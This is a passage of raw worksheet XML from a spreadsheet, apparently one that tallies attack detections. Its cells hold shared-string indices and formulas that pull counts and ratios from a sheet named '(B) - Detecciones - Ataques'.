        <f t="shared" si="21"/>
        <v>-</v>
      </c>
      <c r="AW24" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX24" s="285" t="str">
        <f t="shared" si="18"/>
        <v>-</v>
      </c>
      <c r="AY24" s="278"/>
      <c r="AZ24" s="278"/>
      <c r="BA24" s="278"/>
      <c r="BB24" s="278"/>
      <c r="BC24" s="278"/>
      <c r="BD24" s="278"/>
      <c r="BE24" s="278"/>
      <c r="BF24" s="278"/>
      <c r="BG24" s="278"/>
      <c r="BH24" s="278"/>
      <c r="BI24" s="278"/>
      <c r="BJ24" s="278"/>
      <c r="BK24" s="278"/>
      <c r="BL24" s="278"/>
      <c r="BM24" s="278"/>
      <c r="BN24" s="278"/>
      <c r="BO24" s="278"/>
    </row>
    <row r="25" ht="60.0" customHeight="1">
      <c r="B25" s="142" t="s">
        <v>261</v>
      </c>
      <c r="C25" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D25" s="143" t="s">
        <v>280</v>
      </c>
      <c r="E25" s="145" t="s">
        <v>291</v>
      </c>
      <c r="F25" s="280">
        <f>'(B) - Detecciones - Ataques'!P16</f>
        <v>150</v>
      </c>
      <c r="G25" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ16</f>
        <v>76</v>
      </c>
      <c r="H25" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ16</f>
        <v>0.5066666667</v>
      </c>
      <c r="I25" s="271">
        <f>'(B) - Detecciones - Ataques'!AS16</f>
        <v>76</v>
      </c>
      <c r="J25" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ16</f>
        <v>0.5066666667</v>
      </c>
      <c r="K25" s="271">
        <f>'(B) - Detecciones - Ataques'!BP16</f>
        <v>76</v>
      </c>
      <c r="L25" s="281">
        <f>'(B) - Detecciones - Ataques'!BW16</f>
        <v>0.5066666667</v>
      </c>
      <c r="M25" s="271">
        <f>'(B) - Detecciones - Ataques'!CM16</f>
        <v>76</v>
      </c>
      <c r="N25" s="281">
        <f>'(B) - Detecciones - Ataques'!CT16</f>
        <v>0.5066666667</v>
      </c>
      <c r="O25" s="280">
        <f>'(B) - Detecciones - Ataques'!EC16</f>
        <v>76</v>
      </c>
      <c r="P25" s="281">
        <f>'(B) - Detecciones - Ataques'!ED16</f>
        <v>0.5066666667</v>
      </c>
      <c r="Q25" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AL25" s="287" t="s">
        <v>352</v>
      </c>
      <c r="AM25" s="275">
        <f t="shared" si="9"/>
        <v>2</v>
      </c>
      <c r="AN25" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO25" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP25" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ25" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS25" s="287" t="s">
        <v>352</v>
      </c>
      <c r="AT25" s="275">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="AU25" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV25" s="284">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="AW25" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX25" s="285">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
    </row>
    <row r="26" ht="60.0" customHeight="1">
      <c r="B26" s="142" t="s">
        <v>261</v>
      </c>
      <c r="C26" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D26" s="143" t="s">
        <v>280</v>
      </c>
      <c r="E26" s="145" t="s">
        <v>306</v>
      </c>
      <c r="F26" s="280">
        <f>'(B) - Detecciones - Ataques'!P17</f>
        <v>38</v>
      </c>
      <c r="G26" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ17</f>
        <v>0</v>
      </c>
      <c r="H26" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ17</f>
        <v>0</v>
      </c>
      <c r="I26" s="271">
        <f>'(B) - Detecciones - Ataques'!AS17</f>
        <v>0</v>
      </c>
      <c r="J26" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ17</f>
        <v>0</v>
      </c>
      <c r="K26" s="271">
        <f>'(B) - Detecciones - Ataques'!BP17</f>
        <v>0</v>
      </c>
      <c r="L26" s="281">
        <f>'(B) - Detecciones - Ataques'!BW17</f>
        <v>0</v>
      </c>
      <c r="M26" s="271">
        <f>'(B) - Detecciones - Ataques'!CM17</f>
        <v>0</v>
      </c>
      <c r="N26" s="281">
        <f>'(B) - Detecciones - Ataques'!CT17</f>
        <v>0</v>
      </c>
      <c r="O26" s="280">
        <f>'(B) - Detecciones - Ataques'!EC17</f>
        <v>35</v>
      </c>
      <c r="P26" s="281">
        <f>'(B) - Detecciones - Ataques'!ED17</f>
        <v>0.9210526316</v>
      </c>
      <c r="Q26" s="282" t="s">
        <v>13</v>
      </c>
      <c r="T26" s="291"/>
      <c r="U26" s="292"/>
      <c r="V26" s="292"/>
      <c r="W26" s="292"/>
      <c r="X26" s="292"/>
      <c r="Y26" s="292"/>
      <c r="AA26" s="293"/>
      <c r="AB26" s="294"/>
      <c r="AC26" s="294"/>
      <c r="AD26" s="294"/>
      <c r="AE26" s="294"/>
      <c r="AF26" s="294"/>
      <c r="AL26" s="287" t="s">
        <v>368</v>
      </c>
      <c r="AM26" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN26" s="275">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="AO26" s="284">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
      <c r="AP26" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ26" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS26" s="287" t="s">
        <v>368</v>
      </c>
      <c r="AT26" s="275">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="AU26" s="275">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="AV26" s="284">
        <f t="shared" si="21"/>
        <v>1</v>
      </c>
      <c r="AW26" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX26" s="285">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
    </row>
    <row r="27" ht="60.0" customHeight="1">
      <c r="B27" s="142" t="s">
        <v>261</v>
      </c>
      <c r="C27" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D27" s="143" t="s">
        <v>310</v>
      </c>
      <c r="E27" s="145" t="s">
        <v>314</v>
      </c>
      <c r="F27" s="280">
        <f>'(B) - Detecciones - Ataques'!P18</f>
        <v>1</v>
      </c>
      <c r="G27" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ18</f>
        <v>0</v>
      </c>
      <c r="H27" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ18</f>
        <v>0</v>
      </c>
      <c r="I27" s="271">
        <f>'(B) - Detecciones - Ataques'!AS18</f>
        <v>0</v>
      </c>
      <c r="J27" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ18</f>
        <v>0</v>
      </c>
      <c r="K27" s="271">
        <f>'(B) - Detecciones - Ataques'!BP18</f>
        <v>0</v>
      </c>
      <c r="L27" s="281">
        <f>'(B) - Detecciones - Ataques'!BW18</f>
        <v>0</v>
      </c>
      <c r="M27" s="271">
        <f>'(B) - Detecciones - Ataques'!CM18</f>
        <v>0</v>
      </c>
      <c r="N27" s="281">
        <f>'(B) - Detecciones - Ataques'!CT18</f>
        <v>0</v>
      </c>
      <c r="O27" s="280">
        <f>'(B) - Detecciones - Ataques'!EC18</f>
        <v>3</v>
      </c>
      <c r="P27" s="281">
        <f>'(B) - Detecciones - Ataques'!ED18</f>
        <v>3</v>
      </c>
      <c r="Q27" s="282" t="s">
        <v>13</v>
      </c>
      <c r="T27" s="292"/>
      <c r="U27" s="295"/>
      <c r="V27" s="292"/>
      <c r="W27" s="292"/>
      <c r="X27" s="292"/>
      <c r="Y27" s="292"/>
      <c r="AL27" s="287" t="s">
        <v>386</v>
      </c>
      <c r="AM27" s="275">
        <f t="shared" si="9"/>
        <v>212</v>
      </c>
      <c r="AN27" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO27" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP27" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ27" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS27" s="287" t="s">
        <v>386</v>
      </c>
      <c r="AT27" s="275">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AU27" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV27" s="284" t="str">
        <f t="shared" si="21"/>
        <v>-</v>
      </c>
      <c r="AW27" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX27" s="285" t="str">
        <f t="shared" si="18"/>
        <v>-</v>
      </c>
    </row>
    <row r="28" ht="60.0" customHeight="1">
      <c r="B28" s="142" t="s">
        <v>261</v>
      </c>
      <c r="C28" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D28" s="143" t="s">
        <v>310</v>
      </c>
      <c r="E28" s="145" t="s">
        <v>322</v>
      </c>
      <c r="F28" s="280">
        <f>'(B) - Detecciones - Ataques'!P19</f>
        <v>1</v>
      </c>
      <c r="G28" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ19</f>
        <v>0</v>
      </c>
      <c r="H28" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ19</f>
        <v>0</v>
      </c>
      <c r="I28" s="271">
        <f>'(B) - Detecciones - Ataques'!AS19</f>
        <v>0</v>
      </c>
      <c r="J28" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ19</f>
        <v>0</v>
      </c>
      <c r="K28" s="271">
        <f>'(B) - Detecciones - Ataques'!BP19</f>
        <v>0</v>
      </c>
      <c r="L28" s="281">
        <f>'(B) - Detecciones - Ataques'!BW19</f>
        <v>0</v>
      </c>
      <c r="M28" s="271">
        <f>'(B) - Detecciones - Ataques'!CM19</f>
        <v>0</v>
      </c>
      <c r="N28" s="281">
        <f>'(B) - Detecciones - Ataques'!CT19</f>
        <v>0</v>
      </c>
      <c r="O28" s="280">
        <f>'(B) - Detecciones - Ataques'!EC19</f>
        <v>0</v>
      </c>
      <c r="P28" s="281">
        <f>'(B) - Detecciones - Ataques'!ED19</f>
        <v>0</v>
      </c>
      <c r="Q28" s="282" t="s">
        <v>13</v>
      </c>
      <c r="T28" s="292"/>
      <c r="U28" s="292"/>
      <c r="V28" s="292"/>
      <c r="W28" s="292"/>
      <c r="X28" s="292"/>
      <c r="Y28" s="292"/>
      <c r="AL28" s="287" t="s">
        <v>398</v>
      </c>
      <c r="AM28" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN28" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO28" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP28" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ28" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS28" s="287" t="s">
        <v>398</v>
      </c>
      <c r="AT28" s="275">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="AU28" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV28" s="284">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="AW28" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX28" s="285">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
    </row>
    <row r="29" ht="60.0" customHeight="1">
      <c r="B29" s="296" t="s">
        <v>261</v>
      </c>
      <c r="C29" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D29" s="143" t="s">
        <v>324</v>
      </c>
      <c r="E29" s="145" t="s">
        <v>328</v>
      </c>
      <c r="F29" s="280">
        <f>'(B) - Detecciones - Ataques'!P20</f>
        <v>1</v>
      </c>
      <c r="G29" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ20</f>
        <v>0</v>
      </c>
      <c r="H29" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ20</f>
        <v>0</v>
      </c>
      <c r="I29" s="271">
        <f>'(B) - Detecciones - Ataques'!AS20</f>
        <v>0</v>
      </c>
      <c r="J29" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ20</f>
        <v>0</v>
      </c>
      <c r="K29" s="271">
        <f>'(B) - Detecciones - Ataques'!BP20</f>
        <v>0</v>
      </c>
      <c r="L29" s="281">
        <f>'(B) - Detecciones - Ataques'!BW20</f>
        <v>0</v>
      </c>
      <c r="M29" s="271">
        <f>'(B) - Detecciones - Ataques'!CM20</f>
        <v>0</v>
      </c>
      <c r="N29" s="281">
        <f>'(B) - Detecciones - Ataques'!CT20</f>
        <v>0</v>
      </c>
      <c r="O29" s="280">
        <f>'(B) - Detecciones - Ataques'!EC20</f>
        <v>0</v>
      </c>
      <c r="P29" s="281">
        <f>'(B) - Detecciones - Ataques'!ED20</f>
        <v>0</v>
      </c>
      <c r="Q29" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AL29" s="287" t="s">
        <v>406</v>
      </c>
      <c r="AM29" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN29" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO29" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP29" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ29" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS29" s="287" t="s">
        <v>406</v>
      </c>
      <c r="AT29" s="275">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="AU29" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV29" s="284">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="AW29" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX29" s="285">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
    </row>
    <row r="30" ht="60.0" customHeight="1">
      <c r="B30" s="296" t="s">
        <v>261</v>
      </c>
      <c r="C30" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D30" s="143" t="s">
        <v>332</v>
      </c>
      <c r="E30" s="145" t="s">
        <v>337</v>
      </c>
      <c r="F30" s="280">
        <f>'(B) - Detecciones - Ataques'!P21</f>
        <v>1</v>
      </c>
      <c r="G30" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ21</f>
        <v>1</v>
      </c>
      <c r="H30" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ21</f>
        <v>1</v>
      </c>
      <c r="I30" s="271">
        <f>'(B) - Detecciones - Ataques'!AS21</f>
        <v>1</v>
      </c>
      <c r="J30" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ21</f>
        <v>1</v>
      </c>
      <c r="K30" s="271">
        <f>'(B) - Detecciones - Ataques'!BP21</f>
        <v>1</v>
      </c>
      <c r="L30" s="281">
        <f>'(B) - Detecciones - Ataques'!BW21</f>
        <v>1</v>
      </c>
      <c r="M30" s="271">
        <f>'(B) - Detecciones - Ataques'!CM21</f>
        <v>1</v>
      </c>
      <c r="N30" s="281">
        <f>'(B) - Detecciones - Ataques'!CT21</f>
        <v>1</v>
      </c>
      <c r="O30" s="280">
        <f>'(B) - Detecciones - Ataques'!EC21</f>
        <v>1</v>
      </c>
      <c r="P30" s="281">
        <f>'(B) - Detecciones - Ataques'!ED21</f>
        <v>1</v>
      </c>
      <c r="Q30" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AL30" s="287" t="s">
        <v>421</v>
      </c>
      <c r="AM30" s="275">
        <f t="shared" si="9"/>
        <v>2</v>
      </c>
      <c r="AN30" s="275">
        <f t="shared" si="10"/>
        <v>2</v>
      </c>
      <c r="AO30" s="284">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
      <c r="AP30" s="275">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="AQ30" s="285">
        <f t="shared" si="13"/>
        <v>0.5</v>
      </c>
      <c r="AS30" s="287" t="s">
        <v>421</v>
      </c>
      <c r="AT30" s="275">
        <f t="shared" si="14"/>
        <v>2</v>
      </c>
      <c r="AU30" s="275">
        <f t="shared" si="15"/>
        <v>2</v>
      </c>
      <c r="AV30" s="284">
        <f t="shared" si="21"/>
        <v>1</v>
      </c>
      <c r="AW30" s="275">
        <f t="shared" si="17"/>
        <v>1</v>
      </c>
      <c r="AX30" s="285">
        <f t="shared" si="18"/>
        <v>0.5</v>
      </c>
    </row>
    <row r="31" ht="60.0" customHeight="1">
      <c r="B31" s="296" t="s">
        <v>261</v>
      </c>
      <c r="C31" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D31" s="143" t="s">
        <v>332</v>
      </c>
      <c r="E31" s="145" t="s">
        <v>347</v>
      </c>
      <c r="F31" s="280">
        <f>'(B) - Detecciones - Ataques'!P22</f>
        <v>1</v>
      </c>
      <c r="G31" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ22</f>
        <v>0</v>
      </c>
      <c r="H31" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ22</f>
        <v>0</v>
      </c>
      <c r="I31" s="271">
        <f>'(B) - Detecciones - Ataques'!AS22</f>
        <v>0</v>
      </c>
      <c r="J31" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ22</f>
        <v>0</v>
      </c>
      <c r="K31" s="271">
        <f>'(B) - Detecciones - Ataques'!BP22</f>
        <v>0</v>
      </c>
      <c r="L31" s="281">
        <f>'(B) - Detecciones - Ataques'!BW22</f>
        <v>0</v>
      </c>
      <c r="M31" s="271">
        <f>'(B) - Detecciones - Ataques'!CM22</f>
        <v>0</v>
      </c>
      <c r="N31" s="281">
        <f>'(B) - Detecciones - Ataques'!CT22</f>
        <v>0</v>
      </c>
      <c r="O31" s="280">
        <f>'(B) - Detecciones - Ataques'!EC22</f>
        <v>0</v>
      </c>
      <c r="P31" s="281">
        <f>'(B) - Detecciones - Ataques'!ED22</f>
        <v>0</v>
      </c>
      <c r="Q31" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AL31" s="287" t="s">
        <v>452</v>
      </c>
      <c r="AM31" s="275">
        <f t="shared" si="9"/>
        <v>7</v>
      </c>
      <c r="AN31" s="275">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="AO31" s="284">
        <f t="shared" si="11"/>
        <v>0.1428571429</v>
      </c>
      <c r="AP31" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ31" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS31" s="287" t="s">
        <v>452</v>
      </c>
      <c r="AT31" s="275">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AU31" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV31" s="284" t="str">
        <f t="shared" si="21"/>
        <v>-</v>
      </c>
      <c r="AW31" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX31" s="285" t="str">
        <f t="shared" si="18"/>
        <v>-</v>
      </c>
    </row>
    <row r="32" ht="60.0" customHeight="1">
      <c r="B32" s="296" t="s">
        <v>261</v>
      </c>
      <c r="C32" s="143" t="s">
        <v>351</v>
      </c>
      <c r="D32" s="143" t="s">
        <v>352</v>
      </c>
      <c r="E32" s="145" t="s">
        <v>356</v>
      </c>
      <c r="F32" s="280">
        <f>'(B) - Detecciones - Ataques'!P23</f>
        <v>1</v>
      </c>
      <c r="G32" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ23</f>
        <v>0</v>
      </c>
      <c r="H32" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ23</f>
        <v>0</v>
      </c>
      <c r="I32" s="271">
        <f>'(B) - Detecciones - Ataques'!AS23</f>
        <v>0</v>
      </c>
      <c r="J32" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ23</f>
        <v>0</v>
      </c>
      <c r="K32" s="271">
        <f>'(B) - Detecciones - Ataques'!BP23</f>
        <v>0</v>
      </c>
      <c r="L32" s="281">
        <f>'(B) - Detecciones - Ataques'!BW23</f>
        <v>0</v>
      </c>
      <c r="M32" s="271">
        <f>'(B) - Detecciones - Ataques'!CM23</f>
        <v>0</v>
      </c>
      <c r="N32" s="281">
        <f>'(B) - Detecciones - Ataques'!CT23</f>
        <v>0</v>
      </c>
      <c r="O32" s="280">
        <f>'(B) - Detecciones - Ataques'!EC23</f>
        <v>0</v>
      </c>
      <c r="P32" s="281">
        <f>'(B) - Detecciones - Ataques'!ED23</f>
        <v>0</v>
      </c>
      <c r="Q32" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AL32" s="287" t="s">
        <v>506</v>
      </c>
      <c r="AM32" s="275">
        <f t="shared" si="9"/>
        <v>4</v>
      </c>
      <c r="AN32" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO32" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP32" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ32" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS32" s="287" t="s">
        <v>506</v>
      </c>
      <c r="AT32" s="275">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AU32" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV32" s="284" t="str">
        <f t="shared" si="21"/>
        <v>-</v>
      </c>
      <c r="AW32" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX32" s="285" t="str">
        <f t="shared" si="18"/>
        <v>-</v>
      </c>
    </row>
    <row r="33" ht="60.0" customHeight="1">
      <c r="B33" s="296" t="s">
        <v>261</v>
      </c>
      <c r="C33" s="143" t="s">
        <v>351</v>
      </c>
      <c r="D33" s="143" t="s">
        <v>352</v>
      </c>
      <c r="E33" s="145" t="s">
        <v>364</v>
      </c>
      <c r="F33" s="280">
        <f>'(B) - Detecciones - Ataques'!P24</f>
        <v>1</v>
      </c>
      <c r="G33" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ24</f>
        <v>0</v>
      </c>
      <c r="H33" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ24</f>
        <v>0</v>
      </c>
      <c r="I33" s="271">
        <f>'(B) - Detecciones - Ataques'!AS24</f>
        <v>0</v>
      </c>
      <c r="J33" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ24</f>
        <v>0</v>
      </c>
      <c r="K33" s="271">
        <f>'(B) - Detecciones - Ataques'!BP24</f>
        <v>0</v>
      </c>
      <c r="L33" s="281">
        <f>'(B) - Detecciones - Ataques'!BW24</f>
        <v>0</v>
      </c>
      <c r="M33" s="271">
        <f>'(B) - Detecciones - Ataques'!CM24</f>
        <v>0</v>
      </c>
      <c r="N33" s="281">
        <f>'(B) - Detecciones - Ataques'!CT24</f>
        <v>0</v>
      </c>
      <c r="O33" s="280">
        <f>'(B) - Detecciones - Ataques'!EC24</f>
        <v>0</v>
      </c>
      <c r="P33" s="281">
        <f>'(B) - Detecciones - Ataques'!ED24</f>
        <v>0</v>
      </c>
      <c r="Q33" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AB33" s="268"/>
      <c r="AC33" s="268"/>
      <c r="AD33" s="268"/>
      <c r="AE33" s="268"/>
      <c r="AF33" s="268"/>
      <c r="AL33" s="287" t="s">
        <v>535</v>
      </c>
      <c r="AM33" s="275">
        <f t="shared" si="9"/>
        <v>8</v>
      </c>
      <c r="AN33" s="275">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="AO33" s="284">
        <f t="shared" si="11"/>
        <v>0.125</v>
      </c>
      <c r="AP33" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ33" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS33" s="287" t="s">
        <v>535</v>
      </c>
      <c r="AT33" s="275">
        <f t="shared" si="14"/>
        <v>5</v>
      </c>
      <c r="AU33" s="275">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="AV33" s="284">
        <f t="shared" si="21"/>
        <v>0.2</v>
      </c>
      <c r="AW33" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX33" s="285">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
    </row>
    <row r="34" ht="60.0" customHeight="1">
      <c r="B34" s="296" t="s">
        <v>261</v>
      </c>
      <c r="C34" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D34" s="143" t="s">
        <v>368</v>
      </c>
      <c r="E34" s="145" t="s">
        <v>372</v>
      </c>
      <c r="F34" s="280">
        <f>'(B) - Detecciones - Ataques'!P25</f>
        <v>1</v>
      </c>
      <c r="G34" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ25</f>
        <v>1</v>
      </c>
      <c r="H34" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ25</f>
        <v>1</v>
      </c>
      <c r="I34" s="271">
        <f>'(B) - Detecciones - Ataques'!AS25</f>
        <v>0</v>
      </c>
      <c r="J34" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ25</f>
        <v>0</v>
      </c>
      <c r="K34" s="271">
        <f>'(B) - Detecciones - Ataques'!BP25</f>
        <v>0</v>
      </c>
      <c r="L34" s="281">
        <f>'(B) - Detecciones - Ataques'!BW25</f>
        <v>0</v>
      </c>
      <c r="M34" s="271">
        <f>'(B) - Detecciones - Ataques'!CM25</f>
        <v>0</v>
      </c>
      <c r="N34" s="281">
        <f>'(B) - Detecciones - Ataques'!CT25</f>
        <v>0</v>
      </c>
      <c r="O34" s="280">
        <f>'(B) - Detecciones - Ataques'!EC25</f>
        <v>0</v>
      </c>
      <c r="P34" s="281">
        <f>'(B) - Detecciones - Ataques'!ED25</f>
        <v>0</v>
      </c>
      <c r="Q34" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AA34" s="268" t="s">
        <v>1507</v>
      </c>
      <c r="AL34" s="287" t="s">
        <v>588</v>
      </c>
      <c r="AM34" s="275">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="AN34" s="275">
        <f t="shared" si="10"/>
        <v>3</v>
      </c>
      <c r="AO34" s="284">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
      <c r="AP34" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ34" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS34" s="287" t="s">
        <v>588</v>
      </c>
      <c r="AT34" s="275">
        <f t="shared" si="14"/>
        <v>3</v>
      </c>
      <c r="AU34" s="275">
        <f t="shared" si="15"/>
        <v>3</v>
      </c>
      <c r="AV34" s="284">
        <f t="shared" si="21"/>
        <v>1</v>
      </c>
      <c r="AW34" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX34" s="285">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
    </row>
    <row r="35" ht="60.0" customHeight="1">
      <c r="B35" s="296" t="s">
        <v>262</v>
      </c>
      <c r="C35" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D35" s="143" t="s">
        <v>386</v>
      </c>
      <c r="E35" s="145" t="s">
        <v>390</v>
      </c>
      <c r="F35" s="280">
        <f>'(B) - Detecciones - Ataques'!P26</f>
        <v>212</v>
      </c>
      <c r="G35" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ26</f>
        <v>0</v>
      </c>
      <c r="H35" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ26</f>
        <v>0</v>
      </c>
      <c r="I35" s="271">
        <f>'(B) - Detecciones - Ataques'!AS26</f>
        <v>0</v>
      </c>
      <c r="J35" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ26</f>
        <v>0</v>
      </c>
      <c r="K35" s="271">
        <f>'(B) - Detecciones - Ataques'!BP26</f>
        <v>0</v>
      </c>
      <c r="L35" s="281">
        <f>'(B) - Detecciones - Ataques'!BW26</f>
        <v>0</v>
      </c>
      <c r="M35" s="271">
        <f>'(B) - Detecciones - Ataques'!CM26</f>
        <v>0</v>
      </c>
      <c r="N35" s="281">
        <f>'(B) - Detecciones - Ataques'!CT26</f>
        <v>0</v>
      </c>
      <c r="O35" s="280">
        <f>'(B) - Detecciones - Ataques'!EC26</f>
        <v>0</v>
      </c>
      <c r="P35" s="281">
        <f>'(B) - Detecciones - Ataques'!ED26</f>
        <v>0</v>
      </c>
      <c r="Q35" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AL35" s="287" t="s">
        <v>601</v>
      </c>
      <c r="AM35" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN35" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO35" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP35" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ35" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS35" s="287" t="s">
        <v>601</v>
      </c>
      <c r="AT35" s="275">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="AU35" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV35" s="284">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
